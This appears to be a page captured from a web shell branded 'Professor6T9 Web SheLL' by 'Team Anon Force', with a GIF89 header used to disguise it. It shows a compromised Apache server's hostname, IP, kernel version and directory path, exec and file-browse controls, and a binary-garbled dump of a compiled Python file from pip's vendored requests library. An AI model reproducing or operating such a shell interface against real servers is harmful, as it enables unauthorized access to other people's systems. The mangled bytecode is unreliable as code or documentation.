GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux 98.35.109.208.host.secureserver.net 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
Apache
208.109.35.98
/
lib
/
python3.9
/
site-packages
/
pip
/
_vendor
/
requests
/
__pycache__
[ HOME ]
Exec
Submit
File Name : __init__.cpython-39.pyc
a [��f� � @ s\ d Z ddlmZ ddlZddlmZ dZzddlmZ W n e yN dZ Y n0 dd� Zd d � Zzeeje e� W n. e efy� e�d�eje e�e� Y n0 zvddlmZ es�e d ��zddlZW n e y� dZY n0 eedd��sddlmZ e�� ddlmZ ee� W n e �y, Y n0 ddlmZ e�de� ddlmZmZmZmZ ddlm Z m!Z!m"Z"m#Z# ddlm$Z$m%Z% ddl&m'Z' ddl&m(Z( ddl)m*Z*m+Z+m,Z, ddl-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3m4Z4m5Z5 ddl6m7Z7m8Z8 ddl9m:Z: ddlm;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC ddlDZDddlDmEZE eD�FeG��HeE� � ejdeAdd � dS )!a� Requests HTTP Library ~~~~~~~~~~~~~~~~~~~~~ Requests is an HTTP library, written in Python, for human beings. Basic GET usage: >>> import requests >>> r = requests.get('https://www.python.org') >>> r.status_code 200 >>> b'Python is a programming language' in r.content True ... or POST: >>> payload = dict(key1='value1', key2='value2') >>> r = requests.post('https://httpbin.org/post', data=payload) >>> print(r.text) { ... "form": { "key1": "value1", "key2": "value2" }, ... } The other HTTP methods are supported - see `requests.api`. Full documentation is at <https://requests.readthedocs.io>. :copyright: (c) 2017 by Kenneth Reitz. :license: Apache 2.0, see LICENSE for more details. � )�urllib3N� )�RequestsDependencyWarning)�__version__c C s> | � d�} | dgksJ �t| �dkr.| �d� | \}}}t|�t|�t|� }}}|dks`J �|dkslJ �|dksxJ �|r�|� d�d d� \}}}t|�t|�t|� }}}d |||f kr�d k s�n J �nh|�r2|� d�d d� \}}}t|�t|�t|� }}}d|||f k�r*dk �s:n J �ntd ��d S )N�.�dev� �0r � � � )r r r )� r r )r r r )r r r z7You need either charset_normalizer or chardet installed)�split�len�append�int� Exception)Zurllib3_version�chardet_version�charset_normalizer_version�major�minor�patch� r �A/usr/lib/python3.9/site-packages/pip/_vendor/requests/__init__.py�check_compatibility6 s$ "&r c C sT zt tt| �d���} W n ty, Y d S 0 | g d�k rPd�| �}t�|t� d S )Nr )r r � z4Old version of cryptography ({}) may cause slowdown.) �list�mapr r � ValueError�format�warnings�warnr )�cryptography_versionZwarningr r r �_check_cryptographyT s r# zWurllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported version!)�WINDOWSz3pip internals: don't import cryptography on WindowsZHAS_SNIF)� pyopenssl)�DependencyWarning�ignore)� __title__�__description__�__url__r )� __build__� __author__�__author_email__�__license__)� __copyright__�__cake__)�utils)�packages)�Request�Response�PreparedRequest)�request�get�head�postr �put�delete�options)�session�Session)�codes) �RequestException�Timeout�URLRequired�TooManyRedirects� HTTPError�ConnectionError�FileModeWarning�ConnectTimeout�ReadTimeout)�NullHandler�defaultT)r )I�__doc__Zpip._vendorr r � exceptionsr r Zpip._vendor.chardetr r �ImportErrorr r# �AssertionErrorr r! r Zpip._internal.utils.compatr$ Zssl�getattrZpip._vendor.urllib3.contribr% Zinject_into_urllib3Zcryptographyr"